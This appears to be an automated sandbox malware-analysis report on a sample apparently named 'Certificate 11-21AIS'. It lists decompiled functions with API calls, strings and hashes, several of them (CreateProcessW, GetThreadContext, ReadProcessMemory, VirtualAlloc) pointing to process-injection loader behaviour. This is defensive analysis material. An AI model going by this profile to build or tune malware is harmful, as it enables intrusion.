                                                                              • Instruction ID: a238ff293be5e1c2cff73e321bfafd010b48a48dd068d263a9572c21243c7178
                                                                              • Opcode Fuzzy Hash: 70e86981c3588ff1a2319a4b33ce57f2693724de935e48506bea0ab2cd819ead
                                                                              • Instruction Fuzzy Hash: D4117C75A01108BFEB10EBA8CD86EBF7BBCEF15344F000069B506E7191EA70AE45EB50
                                                                              Function 008C36B8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1219 8c36b8-8c3728 CreateWindowExW * 2 ShowWindow * 2
                                                                              APIs
                                                                              • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 008C36E6
                                                                              • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 008C3707
                                                                              • ShowWindow.USER32(00000000,?,?,?,?,008C3AA3,?), ref: 008C371B
                                                                              • ShowWindow.USER32(00000000,?,?,?,?,008C3AA3,?), ref: 008C3724
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Window$CreateShow
                                                                              • String ID: AutoIt v3$edit
                                                                              • API String ID: 1584632944-3779509399
                                                                              • Opcode ID: 877dd6150410877fe03d1a203527164f5cab90a2f83543a034989e16defac2cd
                                                                              • Instruction ID: 3af0a55d30ae2792598822bdf19b0e32b36212e974d7c646d1b50813e13a8971
                                                                              • Opcode Fuzzy Hash: 877dd6150410877fe03d1a203527164f5cab90a2f83543a034989e16defac2cd
                                                                              • Instruction Fuzzy Hash: 0FF0DA755692D07AEB315B57AC08E672E7DD7C7F24B00001AFA04A62B0C5654896FBB1
                                                                              Function 011B5030 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 132fileCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1324 11b5030-11b5128 call 11b2c80 call 11b4f20 CreateFileW 1331 11b512a 1324->1331 1332 11b512f-11b513f 1324->1332 1333 11b51df-11b51e4 1331->1333 1335 11b5141 1332->1335 1336 11b5146-11b5160 VirtualAlloc 1332->1336 1335->1333 1337 11b5162 1336->1337 1338 11b5164-11b517b ReadFile 1336->1338 1337->1333 1339 11b517f-11b51b9 call 11b4f60 call 11b3f20 1338->1339 1340 11b517d 1338->1340 1345 11b51bb-11b51d0 call 11b4fb0 1339->1345 1346 11b51d5-11b51dd ExitProcess 1339->1346 1340->1333 1345->1346 1346->1333
                                                                              APIs
                                                                                • Part of subcall function 011B4F20: Sleep.KERNELBASE(000001F4), ref: 011B4F31
                                                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 011B511E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696607130.00000000011B2000.00000040.00000020.00020000.00000000.sdmp, Offset: 011B2000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_11b2000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFileSleep
                                                                              • String ID: GHPJRD0HQ6
                                                                              • API String ID: 2694422964-1098286689
                                                                              • Opcode ID: 55234f63df76560a9d3c40128a4eeda02593b4eeecb15115214cea06a2ff9cd2
                                                                              • Instruction ID: d81c766bda205e0f569ea0ed5604b2fa0e57ad9709962b0ca59937dbd602061f
                                                                              • Opcode Fuzzy Hash: 55234f63df76560a9d3c40128a4eeda02593b4eeecb15115214cea06a2ff9cd2
                                                                              • Instruction Fuzzy Hash: E2518071D04249EBEF15DBA4C858BEEBB79AF44300F104198E609BB2C0DB751B45CBA6
                                                                              Function 008C51AF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 008C522F
                                                                              • _wcscpy.LIBCMT ref: 008C5283
                                                                              • Shell_NotifyIconW.SHELL32(00000001,?), ref: 008C5293
                                                                              • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00933CB0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: IconLoadNotifyShell_String_memset_wcscpy
                                                                              • String ID: Line:
                                                                              • API String ID: 1053898822-1585850449
                                                                              • Opcode ID: 2801afb4583ed39ab3a88193de1a235cc664f729a3a9493c1569f1e99cef6535
                                                                              • Instruction ID: dbf9240cd49e75edf236320cd6b82cb58e42de3c39f25bb10a0293477ce6d395
                                                                              • Opcode Fuzzy Hash: 2801afb4583ed39ab3a88193de1a235cc664f729a3a9493c1569f1e99cef6535
                                                                              • Instruction Fuzzy Hash: EE31BC71018740AAD720EB64EC46FDAB7ECFB84314F00851EF599D2191EB70E6899B93
                                                                              Function 008C4139 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 258COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 008C41A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,008C39FE,?,00000001), ref: 008C41DB
                                                                              • _free.LIBCMT ref: 009336B7
                                                                              • _free.LIBCMT ref: 009336FE
                                                                                • Part of subcall function 008CC833: __wsplitpath.LIBCMT ref: 008CC93E
                                                                                • Part of subcall function 008CC833: _wcscpy.LIBCMT ref: 008CC953
                                                                                • Part of subcall function 008CC833: _wcscat.LIBCMT ref: 008CC968
                                                                                • Part of subcall function 008CC833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 008CC978
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
                                                                              • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                              • API String ID: 805182592-1757145024
                                                                              • Opcode ID: 219b15a004d4402fddfda822b2e85e5d7500d4e3242c7651986bec7e7a95d629
                                                                              • Instruction ID: b0f11a37994b914b76b98818cc3f4411f8c3c7fdf2ce54a89a9eb72ae4a472f6
                                                                              • Opcode Fuzzy Hash: 219b15a004d4402fddfda822b2e85e5d7500d4e3242c7651986bec7e7a95d629
                                                                              • Instruction Fuzzy Hash: C1913B71910219AFCF04EFA8C852AEEB7B4FF09314F10852AF456EB291DB349A44CF51
                                                                              Function 008C4A30 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 138COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 008C5374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00981148,?,008C61FF,?,00000000,00000001,00000000), ref: 008C5392
                                                                                • Part of subcall function 008C49FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 008C4A1D
                                                                              • _wcscat.LIBCMT ref: 00932D80
                                                                              • _wcscat.LIBCMT ref: 00932DB5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: _wcscat$FileModuleNameOpen
                                                                              • String ID: \$\Include\
                                                                              • API String ID: 3592542968-2640467822
                                                                              • Opcode ID: 83c774532633810c5504902d7aa1652c35cf577e12365c9276ea690b8a85f143
                                                                              • Instruction ID: 3cf93e182fdbcaa5dd01e19a029ff29a1ab2cdbea9f238a58fcc90ca8d680163
                                                                              • Opcode Fuzzy Hash: 83c774532633810c5504902d7aa1652c35cf577e12365c9276ea690b8a85f143
                                                                              • Instruction Fuzzy Hash: FD51807142C3409BC714EF59D9899AAB7F8FF59300B60492EF649C33A1EB70DA48DB52
                                                                              Function 008E34AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __getstream.LIBCMT ref: 008E34FE
                                                                                • Part of subcall function 008E7C0E: __getptd_noexit.LIBCMT ref: 008E7C0E
                                                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 008E3539
                                                                              • __wopenfile.LIBCMT ref: 008E3549
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                                                              • String ID: <G
                                                                              • API String ID: 1820251861-2138716496
                                                                              • Opcode ID: 956bbdaad1f6d77f9306a63487d6aa0516a395dbb830740cfb4b9216c30586b2
                                                                              • Instruction ID: 438bf7bf56a7f5b3966be92110180d7a59ee38596d5456416814d0b0a9cd7212
                                                                              • Opcode Fuzzy Hash: 956bbdaad1f6d77f9306a63487d6aa0516a395dbb830740cfb4b9216c30586b2
                                                                              • Instruction Fuzzy Hash: F411E771A00286AEDB12BF7B8C4266E36E4FF57354F148425E815DB2C1EB34CE1197A2
                                                                              Function 008DD298 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,008DD28B,SwapMouseButtons,00000004,?), ref: 008DD2BC
                                                                              • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,008DD28B,SwapMouseButtons,00000004,?,?,?,?,008DC865), ref: 008DD2DD
                                                                              • RegCloseKey.KERNELBASE(00000000,?,?,008DD28B,SwapMouseButtons,00000004,?,?,?,?,008DC865), ref: 008DD2FF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CloseOpenQueryValue
                                                                              • String ID: Control Panel\Mouse
                                                                              • API String ID: 3677997916-824357125
                                                                              • Opcode ID: 64335342782d9ab2a52f7e0860c3470775fe653bf88f5a16c555c0710c355f78
                                                                              • Instruction ID: d947536b1c32946b500af36f98c0aa9641333408d443020a408800c89d879269
                                                                              • Opcode Fuzzy Hash: 64335342782d9ab2a52f7e0860c3470775fe653bf88f5a16c555c0710c355f78
                                                                              • Instruction Fuzzy Hash: FA113979615308BFDB248FA8CC84EAF7BB8FF45744F10456AE805D7210E631AE41AB60
                                                                              Function 011B3F20 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 011B46DB
                                                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 011B4771
                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 011B4793
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696607130.00000000011B2000.00000040.00000020.00020000.00000000.sdmp, Offset: 011B2000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_11b2000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                              • String ID:
                                                                              • API String ID: 2438371351-0
                                                                              • Opcode ID: f7a3111ab7015fd8b62422fe8fc399687c9bf18e9b49b2a513bdf356eeec8a8c
                                                                              • Instruction ID: 157ff8dddf0df4f0e976f7f75036d4bca788c6939de82569fb70f5503231dcf0
                                                                              • Opcode Fuzzy Hash: f7a3111ab7015fd8b62422fe8fc399687c9bf18e9b49b2a513bdf356eeec8a8c
                                                                              • Instruction Fuzzy Hash: 2C621D30A14658DBEB28CFA4C880BDEB776EF58300F1091A9D10DEB791E7759E81CB59
                                                                              Function 0090C396 Relevance: 6.2, APIs: 4, Instructions: 154COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 008C4517: _fseek.LIBCMT ref: 008C452F
                                                                                • Part of subcall function 0090C56D: _wcscmp.LIBCMT ref: 0090C65D
                                                                                • Part of subcall function 0090C56D: _wcscmp.LIBCMT ref: 0090C670
                                                                              • _free.LIBCMT ref: 0090C4DD
                                                                              • _free.LIBCMT ref: 0090C4E4
                                                                              • _free.LIBCMT ref: 0090C54F
                                                                                • Part of subcall function 008E1C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,008E7A85), ref: 008E1CB1
                                                                                • Part of subcall function 008E1C9D: GetLastError.KERNEL32(00000000,?,008E7A85), ref: 008E1CC3
                                                                              • _free.LIBCMT ref: 0090C557
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                              • String ID:
                                                                              • API String ID: 1552873950-0
                                                                              • Opcode ID: 2db9d723d2f1f24614347a7e6fc8c80c315d14cd5ac174f49895e1fbecc6b5fc
                                                                              • Instruction ID: 2477af1e6cb2ef82712493f02e3e6597ef6a144179454d8dca48a01c8c3ca0ed
                                                                              • Opcode Fuzzy Hash: 2db9d723d2f1f24614347a7e6fc8c80c315d14cd5ac174f49895e1fbecc6b5fc
                                                                              • Instruction Fuzzy Hash: 13515DB1904219AFDF149F68DC81BADBBB9FF48304F1004AEF219E3291DB715A808F59
                                                                              Function 008C40E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 00933725
                                                                              • GetOpenFileNameW.COMDLG32 ref: 0093376F
                                                                                • Part of subcall function 008C660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008C53B1,?,?,008C61FF,?,00000000,00000001,00000000), ref: 008C662F
                                                                                • Part of subcall function 008C40A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008C40C6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Name$Path$FileFullLongOpen_memset
                                                                              • String ID: X
                                                                              • API String ID: 3777226403-3081909835
                                                                              • Opcode ID: 0b63f0d32f75e91724fa5c4b132d43e534a6f715ae6f8de94e592abfd51b662f
                                                                              • Instruction ID: b87247073984da9cc1a7d0e80d56e2b901ea4cb0177ca867622d0d9079d49197
                                                                              • Opcode Fuzzy Hash: 0b63f0d32f75e91724fa5c4b132d43e534a6f715ae6f8de94e592abfd51b662f
                                                                              • Instruction Fuzzy Hash: 87219671A102989BCB11DFD8D845BDE7BF8EF49304F00805AE545E7241DBB49A898F66
                                                                              Function 0090C71A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetTempPathW.KERNEL32(00000104,?), ref: 0090C72F
                                                                              • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0090C746
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Temp$FileNamePath
                                                                              • String ID: aut
                                                                              • API String ID: 3285503233-3010740371
                                                                              • Opcode ID: 73cfd98c801eb009b5d251d05601143a213475197f37dd2c08c929eaf23e5220
                                                                              • Instruction ID: 83db092722b868d04f478b8a4a7b605f90495e4d06439d8a0f0a2da816f2a9b2
                                                                              • Opcode Fuzzy Hash: 73cfd98c801eb009b5d251d05601143a213475197f37dd2c08c929eaf23e5220
                                                                              • Instruction Fuzzy Hash: 59D05E7950030EABDB50ABA0DC0EF8A776C9B00708F0041A0B764A50B1DAF0E6999B55
                                                                              Function 0091F8AE Relevance: 4.9, APIs: 3, Instructions: 385COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e0a2f2256c6dc67787c5c63905a75c598b8e0a06bc6bddcf69563ae50803a455
                                                                              • Instruction ID: 7744262358b22a328ad04e4f48aa7d4d71be4dd85999b78e40936eb4aec16adb
                                                                              • Opcode Fuzzy Hash: e0a2f2256c6dc67787c5c63905a75c598b8e0a06bc6bddcf69563ae50803a455
                                                                              • Instruction Fuzzy Hash: 7EF17B716083099FC710DF28C891B6AB7E5FF88314F10892EF9999B392D734E945CB82
                                                                              Function 008C4FFC Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 008C5022
                                                                              • Shell_NotifyIconW.SHELL32(00000000,?), ref: 008C50CB
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: IconNotifyShell__memset
                                                                              • String ID:
                                                                              • API String ID: 928536360-0
                                                                              • Opcode ID: 3a885dfdae8d81a4013a56f259f41d09a08eb2bd28b3927e5115a2bc47c55dfa
                                                                              • Instruction ID: c42083c2b2944e2b1cf461e96df45b6aa7febb2693d113d27a7375b9e3f41880
                                                                              • Opcode Fuzzy Hash: 3a885dfdae8d81a4013a56f259f41d09a08eb2bd28b3927e5115a2bc47c55dfa
                                                                              • Instruction Fuzzy Hash: A0314CB1509B01CFD721DF24D885B9BBBF8FB49308F00092EE59AC6251E771A985CB96
                                                                              Function 008E395C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __FF_MSGBANNER.LIBCMT ref: 008E3973
                                                                                • Part of subcall function 008E81C2: __NMSG_WRITE.LIBCMT ref: 008E81E9
                                                                                • Part of subcall function 008E81C2: __NMSG_WRITE.LIBCMT ref: 008E81F3
                                                                              • __NMSG_WRITE.LIBCMT ref: 008E397A
                                                                                • Part of subcall function 008E821F: GetModuleFileNameW.KERNEL32(00000000,00980312,00000104,00000000,00000001,00000000), ref: 008E82B1
                                                                                • Part of subcall function 008E821F: ___crtMessageBoxW.LIBCMT ref: 008E835F
                                                                                • Part of subcall function 008E1145: ___crtCorExitProcess.LIBCMT ref: 008E114B
                                                                                • Part of subcall function 008E1145: ExitProcess.KERNEL32 ref: 008E1154
                                                                                • Part of subcall function 008E7C0E: __getptd_noexit.LIBCMT ref: 008E7C0E
                                                                              • RtlAllocateHeap.NTDLL(00FA0000,00000000,00000001,00000001,00000000,?,?,008DF507,?,0000000E), ref: 008E399F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                              • String ID:
                                                                              • API String ID: 1372826849-0
                                                                              • Opcode ID: 3784d7980bd02219abeb2c751ca26432c0e4f0cba1d782e049381d524d3fdee0
                                                                              • Instruction ID: f441c4d6594ad5ea3a7976a1ba2592e2ce4e3c6ce9bea72f8d4b277be13108b7
                                                                              • Opcode Fuzzy Hash: 3784d7980bd02219abeb2c751ca26432c0e4f0cba1d782e049381d524d3fdee0
                                                                              • Instruction Fuzzy Hash: 6401B936349281AAE6153B2BDC4AB2E3798FB83764F210029F505DB283DFB19D0046A5
                                                                              Function 0090C6D9 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,0090C385,?,?,?,?,?,00000004), ref: 0090C6F2
                                                                              • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,0090C385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 0090C708
                                                                              • CloseHandle.KERNEL32(00000000,?,0090C385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0090C70F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
